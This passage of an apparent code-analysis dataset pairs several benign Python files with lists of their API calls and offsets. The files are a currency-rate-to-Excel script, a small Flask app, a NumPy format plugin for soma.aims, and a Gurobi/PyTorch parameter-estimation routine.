[((244, 280), 'django.contrib.admin.site.register', 'admin.site.register', (['Blog', 'BlogAdmin'], {}), '(Blog, BlogAdmin)\n', (263, 280), False, 'from django.contrib import admin\n')]
|
import requests # Pega informações de API's
from datetime import datetime # Data e hora atual
from openpyxl import Workbook # Cria arquivo Excel
from openpyxl.styles import Alignment, Font # Estilos para células
import pandas as pd # Nesse caso, estou usando p/ transformar em html
# Busca as informações do site
requisicao = requests.get(
"https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL")
# Converte para json
dados = requisicao.json()
# Pegando os dados: dólar, euro e bitcoin
cotacao_dolar = dados["USDBRL"]["bid"]
cotacao_euro = dados["EURBRL"]["bid"]
cotacao_bitcoin = dados["BTCBRL"]["bid"]
# Criando um arquivo cotacao.xlsx
wb = Workbook()
tabela = wb.active
# Título da tabela
tabela.title = "Cotacao Moedas"
# Nomeando as Células
tabela["A1"] = "Moedas"
tabela["B1"] = "Cotação"
tabela["C1"] = "Última Atualização"
# Nome das moedas
tabela["A2"] = "Dólar"
tabela["A3"] = "Euro"
tabela["A4"] = "Bitcoin"
# Valor das cotações
tabela["B2"] = float(cotacao_dolar)
tabela["B3"] = float(cotacao_euro)
tabela["B4"] = float(cotacao_bitcoin)
# Formatação da data atual
tabela["C2"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
tabela["C3"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
tabela["C4"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
# Alinha todas as células preenchidas
celulas = ["a", "b", "c"]
for letra in celulas:
for i in range(1, 5):
if i == 1:
# Deixa a primeira linha em negrito
tabela[letra+str(i)].font = Font(bold=True)
tabela[letra+str(i)].alignment = Alignment("center", "center")
# Salvando a planilha
wb.save("cotacao.xlsx")
# Transformando em html, caso queira enviar para e-mails.
tabela = pd.read_excel("cotacao.xlsx")
tabela.to_html("cotacao.html")
print(tabela)
|
[
"openpyxl.Workbook",
"openpyxl.styles.Font",
"pandas.read_excel",
"openpyxl.styles.Alignment",
"requests.get",
"datetime.datetime.now"
] |
[((332, 411), 'requests.get', 'requests.get', (['"""https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL"""'], {}), "('https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL')\n", (344, 411), False, 'import requests\n'), ((666, 676), 'openpyxl.Workbook', 'Workbook', ([], {}), '()\n', (674, 676), False, 'from openpyxl import Workbook\n'), ((1730, 1759), 'pandas.read_excel', 'pd.read_excel', (['"""cotacao.xlsx"""'], {}), "('cotacao.xlsx')\n", (1743, 1759), True, 'import pandas as pd\n'), ((1119, 1133), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1131, 1133), False, 'from datetime import datetime\n'), ((1187, 1201), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1199, 1201), False, 'from datetime import datetime\n'), ((1255, 1269), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1267, 1269), False, 'from datetime import datetime\n'), ((1585, 1614), 'openpyxl.styles.Alignment', 'Alignment', (['"""center"""', '"""center"""'], {}), "('center', 'center')\n", (1594, 1614), False, 'from openpyxl.styles import Alignment, Font\n'), ((1528, 1543), 'openpyxl.styles.Font', 'Font', ([], {'bold': '(True)'}), '(bold=True)\n', (1532, 1543), False, 'from openpyxl.styles import Alignment, Font\n')]
|
from flask import Flask, render_template
# create a flask application name app
app = Flask(__name__)
@app.route("/")
def index():
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"flask.Flask",
"flask.render_template"
] |
[((86, 101), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (91, 101), False, 'from flask import Flask, render_template\n'), ((143, 172), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (158, 172), False, 'from flask import Flask, render_template\n')]
|
import numpy as np
import atexit
import sys
aims = sys.modules['soma.aims']
'''
IO formats readers / writers written in python for aims.
Currently:
Numpy format for matrices
'''
class NpyFormat(aims.FileFormat_SparseOrDenseMatrix):
def read(self, filename, obj, context, options=None):
mat = np.load(filename)
# currently we need to perform a full copy of the array because
# we cannot prevent it from deleting (when getting back to the C++
# layer the python wrapper is destroyed and any references it holds
# also disapear.
# Or we should manually increment the ref counter in the numpy PyObject
# but it would never be destroyed then.
#vol = aims.Volume(mat)
#vol._npy = mat
vol = aims.Volume(mat.shape, dtype=mat.dtype)
np.asarray(vol)[:, :, 0, 0] = mat
if isinstance(obj, aims.carto.AllocatorContext):
# return the object variant
options = context
context = obj
obj = aims.SparseOrDenseMatrix()
obj.setMatrix(vol)
return obj
# otherwise fill in obj
obj.setMatrix(vol)
return True
def write(self, filename, obj, options):
mat = np.asarray(obj.asDense())
np.save(filename, mat)
hdr = obj.header()
aims.write(hdr, '%s.minf' % filename)
return True
class NpyFinderFormat(aims.FinderFormat):
def check(self, filename, finder):
if filename.endswith('.npy'):
hdr = {
'file_type': 'NPY',
'object_type': 'SparseMatrix',
'data_type': 'DOUBLE',
}
finder.setHeader(hdr)
finder.setObjectType('SparseMatrix')
finder.setDataType('DOUBLE')
return True
return False
def remove_python_formats():
aims.Finder.unregisterFormat('NUMPY')
aims.FileFormatDictionary_SparseOrDenseMatrix.unregisterFormat('NUMPY')
aims.Finder.registerFormat('NUMPY', NpyFinderFormat(), ['npy'])
aims.FileFormatDictionary_SparseOrDenseMatrix.registerFormat(
'NUMPY', NpyFormat(), ['npy'])
atexit.register(remove_python_formats)
|
[
"atexit.register",
"numpy.load",
"numpy.save",
"numpy.asarray"
] |
[((2154, 2192), 'atexit.register', 'atexit.register', (['remove_python_formats'], {}), '(remove_python_formats)\n', (2169, 2192), False, 'import atexit\n'), ((309, 326), 'numpy.load', 'np.load', (['filename'], {}), '(filename)\n', (316, 326), True, 'import numpy as np\n'), ((1280, 1302), 'numpy.save', 'np.save', (['filename', 'mat'], {}), '(filename, mat)\n', (1287, 1302), True, 'import numpy as np\n'), ((821, 836), 'numpy.asarray', 'np.asarray', (['vol'], {}), '(vol)\n', (831, 836), True, 'import numpy as np\n')]
|
import sys, time, itertools, resource, logging
from multiprocessing import Pool, Process
from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype
import torch
import numpy as np
import gurobipy as grb
from scipy.special import loggamma
from sampleForIntegral import integrateOfExponentialOverSimplexInduction2
def estimateParametersY(self, max_iter=10):
logging.info(f'{print_datetime()}Estimating M and sigma_yx_inv')
As = []
Bs = []
sizes = np.fromiter(map(np.size, self.YTs), dtype=float)
for YT, E, XT in zip(self.YTs, self.Es, self.XTs):
if self.dropout_mode == 'raw':
As.append(YT.T @ XT)
Bs.append(XT.T @ XT)
else:
raise NotImplementedError
m = grb.Model('M')
m.setParam('OutputFlag', False)
m.Params.Threads = 1
if self.M_constraint == 'sum2one':
vM = m.addVars(self.GG, self.K, lb=0.)
m.addConstrs((vM.sum('*', i) == 1 for i in range(self.K)))
else:
raise NotImplementedError
for iiter in range(max_iter):
obj = 0
for beta, YT, sigma_yx_inv, A, B, G, XT in zip(self.betas, self.YTs, self.sigma_yx_invs, As, Bs, self.Gs, self.XTs):
# constant terms
if self.dropout_mode == 'raw':
t = YT.ravel()
else:
raise NotImplementedError
obj += beta * sigma_yx_inv**2 * np.dot(t, t)
# linear terms
t = -2 * beta * sigma_yx_inv**2 * A
obj += grb.quicksum([t[i, j] * vM[i, j] for i in range(G) for j in range(self.K)])
# quadratic terms
if self.dropout_mode == 'raw':
t = beta * sigma_yx_inv**2 * B
t[np.diag_indices(self.K)] += 1e-5
obj += grb.quicksum([t[i, i] * vM[k, i] * vM[k, i] for k in range(G) for i in range(self.K)])
t *= 2
obj += grb.quicksum([t[i, j] * vM[k, i] * vM[k, j] for k in range(G) for i in range(self.K) for j in range(i+1, self.K)])
else:
raise NotImplementedError
del t, beta, YT, A, B, G
kk = 0
if kk != 0:
obj += grb.quicksum([kk/2 * vM[k, i] * vM[k, i] for k in range(self.GG) for i in range(self.K)])
m.setObjective(obj, grb.GRB.MINIMIZE)
m.optimize()
self.M = np.array([[vM[i, j].x for j in range(self.K)] for i in range(self.GG)])
if self.M_constraint in ['sum2one', 'none']:
pass
elif self.M_constraint == 'L1':
self.M /= np.abs(self.M).sum(0, keepdims=True)
elif self.M_constraint == 'L2':
self.M /= np.sqrt((self.M ** 2).sum(0, keepdims=True))
else:
raise NotImplementedError
last_sigma_yx_invs = np.copy(self.sigma_yx_invs)
ds = np.array([
np.dot(YT.ravel(), YT.ravel()) - 2*np.dot(A.ravel(), self.M[:G].ravel()) + np.dot(B.ravel(), (self.M[:G].T @ self.M[:G]).ravel())
for YT, A, B, G in zip(self.YTs, As, Bs, self.Gs)
])
if self.sigma_yx_inv_mode == 'separate':
t = ds / sizes
self.sigma_yx_invs = 1. / np.sqrt(t)
elif self.sigma_yx_inv_mode == 'average':
t = np.dot(self.betas, ds) / np.dot(self.betas, sizes)
self.sigma_yx_invs = np.full(self.num_repli, 1 / (np.sqrt(t) + 1e-20))
elif self.sigma_yx_inv_mode.startswith('average '):
idx = np.array(list(map(int, self.sigma_yx_inv_mode.split(' ')[1:])))
t = np.dot(self.betas[idx], ds[idx]) / np.dot(self.betas[idx], sizes[idx])
self.sigma_yx_invs = np.full(self.num_repli, 1 / (np.sqrt(t) + 1e-20))
else:
raise NotImplementedError
d = self.sigma_yx_invs - last_sigma_yx_invs
logging.info(f"{print_datetime()}At iter {iiter}, σ_yxInv: {array2string(d)} -> {array2string(self.sigma_yx_invs)}")
if (np.abs(d) / self.sigma_yx_invs).max() < 1e-5 or self.num_repli <= 1 or self.sigma_yx_inv_mode.startswith('average'):
break
# emission
Q_Y = -np.dot(self.betas, sizes) / 2
# partition function - Pr [ Y | X, Theta ]
Q_Y -= np.dot(self.betas, sizes) * np.log(2*np.pi) / 2
Q_Y += (sizes * self.betas * np.log(self.sigma_yx_invs)).sum()
return Q_Y
def estimateParametersX(self, iiter):
logging.info(f'{print_datetime()}Estimating Sigma_x_inv and prior_xs')
device = self.PyTorch_device
Bs = []
talphas = []
talpha_es = []
tC = torch.zeros([self.K, self.K], dtype=dtype, device=device)
tnus = []
for YT, E, XT, beta in zip(self.YTs, self.Es, self.XTs, self.betas):
tXT = torch.tensor(XT, dtype=dtype, device=device)
N, G = YT.shape
if self.dropout_mode == 'raw':
Bs.append(XT.T @ XT)
else:
raise NotImplementedError
talphas.append(tXT.sum(0))
talpha_es.append(torch.tensor(list(map(len, E)), dtype=dtype, device=device) @ tXT)
tXT.div_(tXT.sum(1, keepdim=True).add_(1e-30))
tnu = torch.empty([N, self.K], dtype=dtype, device=device)
for tnui, ei in zip(tnu, E):
tnui.copy_(tXT[ei].sum(0))
tnus.append(tnu)
tC.add_(alpha=beta, other=tXT.t() @ tnu)
del tXT
Q_X = 0
if all(prior_x[0] == 'Gaussian' for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'linear':
raise NotImplementedError
elif self.pairwise_potential_mode in ['linear', 'linear w/ shift']:
raise NotImplementedError
elif all(prior_x[0] in ['Exponential shared', 'Exponential shared fixed'] for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'normalized':
prior_xs_old = self.prior_xs
self.prior_xs = []
for N, prior_x, talpha in zip(self.Ns, prior_xs_old, talphas):
if prior_x[0] == 'Exponential shared':
lambda_x, = prior_x[1:]
lambda_x = talpha.mean().div_(N).pow(-1).cpu().data.numpy()
Q_X -= lambda_x * talpha.sum().cpu().data.numpy()
Q_X += N*self.K*np.log(lambda_x) - N*loggamma(self.K)
prior_x = prior_x[:1] + (np.full(self.K, lambda_x), )
self.prior_xs.append(prior_x)
elif prior_x[0] == 'Exponential shared fixed':
lambda_x, = prior_x[1:]
Q_X -= lambda_x.mean() * talpha.sum().cpu().data.numpy()
self.prior_xs.append(prior_x)
else:
raise NotImplementedError
del prior_xs_old
if not all(self.Es_empty):
# valid_diter = 1
# valid_diter = 7
# valid_diter = 31
# valid_diter = 97
valid_diter = 331
# valid_diter = 997
# valid_diter = 3343
# valid_diter = 7177
# valid_diter = 9973
max_iter = 1e4
max_iter = int(max_iter)
batch_sizes = [512, ] * self.num_repli
# requires_grad = True
requires_grad = False
var_list = []
optimizers = []
schedulars = []
tSigma_x_inv = torch.tensor(self.Sigma_x_inv, dtype=dtype, device=device, requires_grad=requires_grad)
var_list += [
tSigma_x_inv,
]
schedular = None
optimizer = torch.optim.Adam([tSigma_x_inv], lr=1e-2)
schedular = torch.optim.lr_scheduler.StepLR(optimizer, valid_diter, gamma=0.98)
optimizers.append(optimizer)
if schedular: schedulars.append(schedular)
del optimizer, schedular
tprior_xs = []
for prior_x in self.prior_xs:
if prior_x[0] in ['Exponential shared', 'Exponential shared fixed']:
lambda_x, = prior_x[1:]
tlambda_x = torch.tensor(lambda_x, dtype=dtype, device=device, requires_grad=requires_grad)
tprior_xs.append((prior_x[0], tlambda_x,))
var_list.append(tlambda_x)
del lambda_x
else:
raise NotImplementedError
for t in var_list: t.grad = torch.zeros_like(t)
tdiagBs = [torch.tensor(np.diag(B).copy(), dtype=dtype, device=device) for B in Bs]
tNus = [tnu.sum(0) for tnu in tnus]
tNu2s = [tnu.t() @ tnu for tnu in tnus]
talpha_e_all = torch.zeros_like(talpha_es[0])
for beta, talpha_e in zip(self.betas, talpha_es): talpha_e_all.add_(alpha=beta, other=talpha_e)
NEs = [sum(map(len, E)) for E in self.Es]
tnEs = [torch.tensor(list(map(len, E)), dtype=dtype, device=device) for E in self.Es]
tZTs = [torch.tensor(XT, dtype=dtype, device=device) for XT in self.XTs]
for tZT in tZTs: tZT.div_(tZT.sum(1, keepdim=True))
# Sigma_x_inv_ub = 1.
# Sigma_x_inv_lb = -1.
Sigma_x_inv_lb = None
Sigma_x_inv_ub = None
Sigma_x_inv_constraint = None # complete matrix
# Sigma_x_inv_constraint = 'diagonal' # diagonal matrix
# Sigma_x_inv_constraint = 'diagonal same' # diagonal matrix, diagonal values are all the same
row_idx, col_idx = np.triu_indices(self.K, 0)
assumption_str = 'mean-field'
# assumption_str = None
# assumption_str = 'independent'
random_flag = assumption_str in [
'independent',
'mean-field',
]
n_samples = 0
regenerate_diter = int(1e10)
tZes = [None] * self.num_repli
nsample4integral = 64
if assumption_str == None:
raise NotImplementedError
elif assumption_str == 'mean-field':
pass
elif assumption_str == 'independent':
raise NotImplementedError
else:
raise NotImplementedError
if assumption_str in [None, 'independent']:
tC.div_(2)
loggamma_K = loggamma(self.K)
__t__, func, last_func = 0, None, torch.empty([], dtype=dtype, device=device).fill_(np.nan)
best_func, best_iter = torch.empty([], dtype=dtype, device=device).fill_(np.nan), -1
tSigma_x_inv_best = None
for __t__ in range(max_iter + 1):
if not requires_grad:
for t in var_list: t.grad.zero_()
else:
for optimizer in optimizers:
optimizer.zero_grad()
assert (tSigma_x_inv - tSigma_x_inv.t()).abs().max() < 1e-15
if Sigma_x_inv_lb is not None:
tSigma_x_inv.clamp_(min=Sigma_x_inv_lb)
if Sigma_x_inv_ub is not None:
tSigma_x_inv.clamp_(max=Sigma_x_inv_ub)
if Sigma_x_inv_constraint in ['diagonal', 'diagonal same']:
tSigma_x_inv.triu_().tril_()
if Sigma_x_inv_constraint in ['diagonal same']:
tSigma_x_inv[(range(self.K), range(self.K))] = tSigma_x_inv[(range(self.K), range(self.K))].mean()
func = torch.zeros([], dtype=dtype, device=device)
# if requires_grad:
func_grad = torch.zeros([], dtype=dtype, device=device, requires_grad=True)
# pairwise potential
tSigma_x_inv.grad.add_(tC)
if requires_grad:
func_grad = func_grad + tC.view(-1) @ tSigma_x_inv.view(-1)
else:
func.add_(tC.view(-1) @ tSigma_x_inv.view(-1))
for N, E_empty, NE, tnE, E, beta, tZT, tZe, talpha, tnu, tNu, tNu2, tdiagB, tprior_x in zip(
self.Ns,
self.Es_empty, NEs, tnEs, self.Es, self.betas, tZTs, tZes,
talphas, tnus, tNus, tNu2s, tdiagBs,
tprior_xs,
):
if E_empty:
continue
if assumption_str == 'mean-field':
if tprior_x[0] in ['Exponential shared', 'Exponential shared fixed']:
if __t__ % valid_diter == 0:
idx = slice(None)
else:
idx = np.random.choice(N, min(nsample4integral, N), replace=False)
tnu = tnu[idx].contiguous()
c = NE / tnE[idx].sum()
# Z_z
teta = tnu @ tSigma_x_inv
teta.grad = torch.zeros_like(teta)
# torch.manual_seed(iiter)
if iiter > 1 or __t__ > 100:
# tlogZ = integrateOfExponentialOverSimplexSampling(teta, requires_grad=requires_grad, seed=iiter*max_iter+__t__)
tlogZ = integrateOfExponentialOverSimplexInduction2(teta, grad=c, requires_grad=requires_grad, device=device)
else:
# tlogZ = integrateOfExponentialOverSimplexSampling(teta, requires_grad=requires_grad, seed=iiter*max_iter+__t__)
tlogZ = integrateOfExponentialOverSimplexInduction2(teta, grad=c, requires_grad=requires_grad, device=device)
if requires_grad:
func_grad = func_grad.add(beta*c, tlogZ.sum())
else:
func.add_(alpha=beta*c, other=tlogZ.sum())
tSigma_x_inv.grad.addmm_(alpha=beta, mat1=tnu.t(), mat2=teta.grad)
else:
raise NotImplementedError
elif assumption_str == None:
raise NotImplementedError
elif assumption_str == 'independent':
raise NotImplementedError
else:
raise NotImplementedError
if requires_grad:
func_grad.backward()
func = func + func_grad
# prior on Σ_x^inv
# num_burnin_iter = 200
# if iiter <= num_burnin_iter:
# kk = 1e-1 * np.dot(betas, list(map(len, Es))) * 1e-1**((num_burnin_iter-iiter+1)/num_burnin_iter)
# else:
# kk = 1e-1 * np.dot(betas, list(map(len, Es)))
kk = self.lambda_SigmaXInv * np.dot(self.betas, NEs)
tSigma_x_inv.grad.add_(kk, tSigma_x_inv)
func.add_(kk / 2, tSigma_x_inv.pow(2).sum())
# normalize gradient by the weighted sizes of data sets
tSigma_x_inv.grad.div_(np.dot(self.betas, NEs))
func.div_(np.dot(self.betas, list(map(len, self.YTs))))
tSigma_x_inv.grad.add_(tSigma_x_inv.grad.clone().t()).div_(2)
if Sigma_x_inv_lb is not None:
tSigma_x_inv.grad[(tSigma_x_inv <= Sigma_x_inv_lb) * (tSigma_x_inv.grad > 0)] = 0
if Sigma_x_inv_ub is not None:
tSigma_x_inv.grad[(tSigma_x_inv >= Sigma_x_inv_ub) * (tSigma_x_inv.grad < 0)] = 0
if Sigma_x_inv_constraint in ['diagonal', 'diagonal same']:
tSigma_x_inv.grad.triu_().tril_()
if Sigma_x_inv_constraint in ['diagonal same']:
tSigma_x_inv.grad[(range(self.K), range(self.K))] = tSigma_x_inv.grad[(range(self.K), range(self.K))].mean()
# setting flags
best_flag = False
if not random_flag or __t__ % valid_diter == 0:
best_flag = not best_func <= func
if best_flag:
best_func, best_iter = func, __t__
tSigma_x_inv_best = tSigma_x_inv.clone().detach()
stop_flag = True
# stop_flag = False
stop_tSigma_x_inv_grad_pseudo = 1e-1
stop_flag &= (tSigma_x_inv.grad.abs() / (tSigma_x_inv.abs() + stop_tSigma_x_inv_grad_pseudo)).abs().max().item() < 1e-2
for tprior_x in tprior_xs:
if tprior_x[0] in ['Exponential shared', ]:
tlambda_x, = tprior_x[1:]
stop_flag &= tlambda_x.grad.abs().max().item() < 1e-4
del tlambda_x
elif tprior_x[0] in ['Exponential shared fixed', ]:
pass
else:
raise NotImplementedError
if random_flag:
stop_flag &= not bool(func <= last_func - 1e-3*valid_diter)
else:
stop_flag &= not bool(func <= last_func - 1e-3)
stop_flag |= random_flag and not __t__ < best_iter + 2*valid_diter
# stop_flag |= best_func == func and __t__ > best_iter + 20
if random_flag and __t__ % valid_diter != 0:
stop_flag = False
if __t__ >= max_iter:
stop_flag = True
warning_flag = bool(func > last_func + 1e-10)
warning_flag &= not random_flag or __t__ % valid_diter == 0
# warning_flag = True
if __t__ % valid_diter == 0 or stop_flag or warning_flag or (regenerate_diter != 1 and (__t__ % regenerate_diter == 0 or (__t__+1) % regenerate_diter == 0)):
print(
f'At iter {__t__},\t'
f'func = {(func - last_func).item():.2e} -> {func.item():.2e}\t'
f'Σ_x^inv: {tSigma_x_inv.max().item():.1e} - {tSigma_x_inv.min().item():.1e} = {tSigma_x_inv.max() - tSigma_x_inv.min():.1e} '
f'grad = {tSigma_x_inv.grad.min().item():.2e} {tSigma_x_inv.grad.max().item():.2e}\t'
f'var/grad = {(tSigma_x_inv.grad.abs()/(tSigma_x_inv.abs() + stop_tSigma_x_inv_grad_pseudo)).abs().max().item():.2e}'
# f'δ_x: {tdelta_x.max().item():.1e} - {tdelta_x.min().item():.1e} = {tdelta_x.max() - tdelta_x.min():.1e} '
# f'grad = {tdelta_x.grad.min().item():.2e} {tdelta_x.grad.max().item():.2e}'
, end=''
)
if warning_flag: print('\tWarning', end='')
if best_flag:
print('\tbest', end='')
print()
sys.stdout.flush()
# stop_flag = True
if not stop_flag:
for optimizer in optimizers: optimizer.step()
for schedular in schedulars: schedular.step()
if stop_flag: break
if not random_flag or __t__ % valid_diter == 0:
last_func = func
tSigma_x_inv = tSigma_x_inv_best
func = best_func
self.Sigma_x_inv = tSigma_x_inv.cpu().data.numpy()
Q_X -= func.mul_(np.dot(self.betas, list(map(len, self.YTs)))).item()
elif all(prior_x[0] == 'Exponential' for prior_x in self.prior_xs) and self.pairwise_potential_mode == 'normalized':
raise NotImplementedError
else:
raise NotImplementedError
return Q_X
|
[
"util.array2string",
"sampleForIntegral.integrateOfExponentialOverSimplexInduction2",
"torch.optim.lr_scheduler.StepLR",
"numpy.abs",
"torch.empty",
"sys.stdout.flush",
"numpy.diag",
"numpy.full",
"scipy.special.loggamma",
"numpy.copy",
"torch.zeros",
"torch.zeros_like",
"util.print_datetime",
"numpy.diag_indices",
"gurobipy.Model",
"numpy.triu_indices",
"torch.optim.Adam",
"numpy.dot",
"numpy.log",
"torch.tensor",
"numpy.sqrt"
] |
[((705, 719), 'gurobipy.Model', 'grb.Model', (['"""M"""'], {}), "('M')\n", (714, 719), True, 'import gurobipy as grb\n'), ((3943, 4000), 'torch.zeros', 'torch.zeros', (['[self.K, self.K]'], {'dtype': 'dtype', 'device': 'device'}), '([self.K, self.K], dtype=dtype, device=device)\n', (3954, 4000), False, 'import torch\n'), ((2396, 2423), 'numpy.copy', 'np.copy', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (2403, 2423), True, 'import numpy as np\n'), ((4090, 4134), 'torch.tensor', 'torch.tensor', (['XT'], {'dtype': 'dtype', 'device': 'device'}), '(XT, dtype=dtype, device=device)\n', (4102, 4134), False, 'import torch\n'), ((4419, 4471), 'torch.empty', 'torch.empty', (['[N, self.K]'], {'dtype': 'dtype', 'device': 'device'}), '([N, self.K], dtype=dtype, device=device)\n', (4430, 4471), False, 'import torch\n'), ((3547, 3572), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (3553, 3572), True, 'import numpy as np\n'), ((3629, 3654), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (3635, 3654), True, 'import numpy as np\n'), ((3657, 3674), 'numpy.log', 'np.log', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (3663, 3674), True, 'import numpy as np\n'), ((403, 419), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (417, 419), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((1256, 1268), 'numpy.dot', 'np.dot', (['t', 't'], {}), '(t, t)\n', (1262, 1268), True, 'import numpy as np\n'), ((2724, 2734), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (2731, 2734), True, 'import numpy as np\n'), ((3707, 3733), 'numpy.log', 'np.log', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (3713, 3733), True, 'import numpy as np\n'), ((3811, 3827), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (3825, 3827), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((1508, 1531), 'numpy.diag_indices', 
'np.diag_indices', (['self.K'], {}), '(self.K)\n', (1523, 1531), True, 'import numpy as np\n'), ((2786, 2808), 'numpy.dot', 'np.dot', (['self.betas', 'ds'], {}), '(self.betas, ds)\n', (2792, 2808), True, 'import numpy as np\n'), ((2811, 2836), 'numpy.dot', 'np.dot', (['self.betas', 'sizes'], {}), '(self.betas, sizes)\n', (2817, 2836), True, 'import numpy as np\n'), ((3292, 3308), 'util.print_datetime', 'print_datetime', ([], {}), '()\n', (3306, 3308), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((3337, 3352), 'util.array2string', 'array2string', (['d'], {}), '(d)\n', (3349, 3352), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((3358, 3390), 'util.array2string', 'array2string', (['self.sigma_yx_invs'], {}), '(self.sigma_yx_invs)\n', (3370, 3390), False, 'from util import psutil_process, print_datetime, array2string, PyTorchDType as dtype\n'), ((6136, 6228), 'torch.tensor', 'torch.tensor', (['self.Sigma_x_inv'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': 'requires_grad'}), '(self.Sigma_x_inv, dtype=dtype, device=device, requires_grad=\n requires_grad)\n', (6148, 6228), False, 'import torch\n'), ((6299, 6340), 'torch.optim.Adam', 'torch.optim.Adam', (['[tSigma_x_inv]'], {'lr': '(0.01)'}), '([tSigma_x_inv], lr=0.01)\n', (6315, 6340), False, 'import torch\n'), ((6356, 6423), 'torch.optim.lr_scheduler.StepLR', 'torch.optim.lr_scheduler.StepLR', (['optimizer', 'valid_diter'], {'gamma': '(0.98)'}), '(optimizer, valid_diter, gamma=0.98)\n', (6387, 6423), False, 'import torch\n'), ((7158, 7188), 'torch.zeros_like', 'torch.zeros_like', (['talpha_es[0]'], {}), '(talpha_es[0])\n', (7174, 7188), False, 'import torch\n'), ((7891, 7917), 'numpy.triu_indices', 'np.triu_indices', (['self.K', '(0)'], {}), '(self.K, 0)\n', (7906, 7917), True, 'import numpy as np\n'), ((8502, 8518), 'scipy.special.loggamma', 'loggamma', (['self.K'], {}), '(self.K)\n', (8510, 8518), 
False, 'from scipy.special import loggamma\n'), ((2206, 2220), 'numpy.abs', 'np.abs', (['self.M'], {}), '(self.M)\n', (2212, 2220), True, 'import numpy as np\n'), ((3045, 3077), 'numpy.dot', 'np.dot', (['self.betas[idx]', 'ds[idx]'], {}), '(self.betas[idx], ds[idx])\n', (3051, 3077), True, 'import numpy as np\n'), ((3080, 3115), 'numpy.dot', 'np.dot', (['self.betas[idx]', 'sizes[idx]'], {}), '(self.betas[idx], sizes[idx])\n', (3086, 3115), True, 'import numpy as np\n'), ((6950, 6969), 'torch.zeros_like', 'torch.zeros_like', (['t'], {}), '(t)\n', (6966, 6969), False, 'import torch\n'), ((7433, 7477), 'torch.tensor', 'torch.tensor', (['XT'], {'dtype': 'dtype', 'device': 'device'}), '(XT, dtype=dtype, device=device)\n', (7445, 7477), False, 'import torch\n'), ((9397, 9440), 'torch.zeros', 'torch.zeros', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (9408, 9440), False, 'import torch\n'), ((9481, 9544), 'torch.zeros', 'torch.zeros', (['[]'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': '(True)'}), '([], dtype=dtype, device=device, requires_grad=True)\n', (9492, 9544), False, 'import torch\n'), ((2890, 2900), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (2897, 2900), True, 'import numpy as np\n'), ((3400, 3409), 'numpy.abs', 'np.abs', (['d'], {}), '(d)\n', (3406, 3409), True, 'import numpy as np\n'), ((6700, 6779), 'torch.tensor', 'torch.tensor', (['lambda_x'], {'dtype': 'dtype', 'device': 'device', 'requires_grad': 'requires_grad'}), '(lambda_x, dtype=dtype, device=device, requires_grad=requires_grad)\n', (6712, 6779), False, 'import torch\n'), ((11828, 11851), 'numpy.dot', 'np.dot', (['self.betas', 'NEs'], {}), '(self.betas, NEs)\n', (11834, 11851), True, 'import numpy as np\n'), ((12034, 12057), 'numpy.dot', 'np.dot', (['self.betas', 'NEs'], {}), '(self.betas, NEs)\n', (12040, 12057), True, 'import numpy as np\n'), ((14969, 14987), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (14985, 14987), False, 
'import sys, time, itertools, resource, logging\n'), ((3169, 3179), 'numpy.sqrt', 'np.sqrt', (['t'], {}), '(t)\n', (3176, 3179), True, 'import numpy as np\n'), ((5330, 5346), 'numpy.log', 'np.log', (['lambda_x'], {}), '(lambda_x)\n', (5336, 5346), True, 'import numpy as np\n'), ((5351, 5367), 'scipy.special.loggamma', 'loggamma', (['self.K'], {}), '(self.K)\n', (5359, 5367), False, 'from scipy.special import loggamma\n'), ((5397, 5422), 'numpy.full', 'np.full', (['self.K', 'lambda_x'], {}), '(self.K, lambda_x)\n', (5404, 5422), True, 'import numpy as np\n'), ((8557, 8600), 'torch.empty', 'torch.empty', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (8568, 8600), False, 'import torch\n'), ((8641, 8684), 'torch.empty', 'torch.empty', (['[]'], {'dtype': 'dtype', 'device': 'device'}), '([], dtype=dtype, device=device)\n', (8652, 8684), False, 'import torch\n'), ((6998, 7008), 'numpy.diag', 'np.diag', (['B'], {}), '(B)\n', (7005, 7008), True, 'import numpy as np\n'), ((10426, 10448), 'torch.zeros_like', 'torch.zeros_like', (['teta'], {}), '(teta)\n', (10442, 10448), False, 'import torch\n'), ((10657, 10763), 'sampleForIntegral.integrateOfExponentialOverSimplexInduction2', 'integrateOfExponentialOverSimplexInduction2', (['teta'], {'grad': 'c', 'requires_grad': 'requires_grad', 'device': 'device'}), '(teta, grad=c, requires_grad=\n requires_grad, device=device)\n', (10700, 